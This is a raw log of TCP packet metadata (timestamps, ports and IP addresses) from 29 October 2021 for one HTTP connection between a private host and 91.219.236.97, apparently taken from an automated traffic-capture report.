Oct 29, 2021 20:51:03.276102066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276120901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276139021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276137114 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.276154041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276170969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276202917 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.276226044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276235104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.276248932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276268959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276283026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276328087 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.309904099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.309931993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.309947014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.309968948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.309984922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310004950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310019016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310077906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310096025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310100079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.310153961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.310242891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310256004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.310292959 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.365474939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365511894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365539074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365556955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365576982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365593910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365609884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365626097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365641117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365653038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365665913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365681887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365679979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.365695000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.365804911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.375282049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375315905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375332117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375344992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375446081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.375488997 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.375822067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375907898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375926018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375938892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375973940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.375988960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.375999928 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.376034021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.376089096 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.376157999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.376194000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.376247883 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.408049107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.408093929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.408118010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.408149958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.408215046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.408261061 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.410026073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410056114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410082102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410181046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.410204887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410232067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410250902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.410254955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410273075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.410295010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.441138029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.441164017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.441179991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.441195011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.441297054 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.445029020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445051908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445067883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445085049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445158005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445190907 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.445245028 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.445247889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445303917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.445355892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.474009991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.474034071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.474046946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.474059105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.474168062 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.475541115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.475564957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.475578070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.475589991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.475644112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.475677013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.480653048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.480675936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.480710030 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.480722904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.480792046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.480823994 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.508184910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508207083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508219957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508233070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508249044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508265018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508337021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.508347034 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.508394957 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.512923002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.512974024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.512989998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.513003111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.513062000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.513134003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.539886951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.539925098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.539942980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.539954901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.540024042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.540062904 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.541435957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.541462898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.541480064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.541491985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.541543007 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.541575909 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.546508074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546533108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546555996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546572924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546588898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546605110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546619892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.546663046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.546704054 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.837388992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.837523937 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.867852926 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.908037901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908081055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908106089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908128977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908152103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908173084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908190012 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.908216000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908241034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908251047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.908263922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908288002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908298016 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.908312082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908339977 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.908355951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908397913 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.908426046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908449888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.908487082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.943676949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.943720102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.943743944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.943766117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.943856955 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.943911076 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.943981886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944008112 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944031000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944052935 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944053888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944098949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944101095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944125891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944156885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944164038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944201946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944237947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944247961 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944273949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944297075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944309950 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944319963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944355965 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944618940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944648981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944674015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944686890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944698095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944736004 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.944932938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944972038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.944997072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.945014954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.945020914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.945059061 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.945066929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.945091963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.945115089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.945139885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.945143938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.945182085 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.020561934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020600080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020623922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020643950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020665884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020683050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020699024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020710945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020723104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020726919 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.020740032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020756960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020777941 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020796061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020832062 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.020844936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020876884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020879984 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.020894051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020895958 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.020912886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020929098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020937920 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.020945072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020962954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020982027 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.020998955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021015882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021022081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021028042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021043062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021065950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021075964 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021089077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021097898 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021137953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021152020 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021159887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021184921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021204948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021205902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021230936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021246910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021254063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021272898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021295071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021298885 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021312952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021330118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021341085 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021354914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021384001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021382093 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021408081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021430016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021446943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021450043 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021464109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021477938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021480083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021497011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021508932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021512985 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021522045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021536112 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021543026 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021553993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021575928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021596909 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021600008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021624088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021625996 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021644115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021655083 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021660089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021677017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021688938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021692991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021711111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.021725893 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.021753073 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.057693958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.057729006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.057985067 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.345295906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.345474005 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.662368059 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.724961996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725001097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725028992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725053072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725079060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725105047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725127935 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725152969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725153923 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.725177050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725204945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.725245953 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.725291014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758045912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758100986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758128881 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758153915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758178949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758203983 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758229017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758255005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758268118 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758306980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758315086 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758335114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758339882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758356094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758382082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758398056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758424044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758445978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758450031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758491993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758492947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:04.758517981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758548975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:04.758560896 CEST	49865	80	192.168.2.4	91.219.236.97
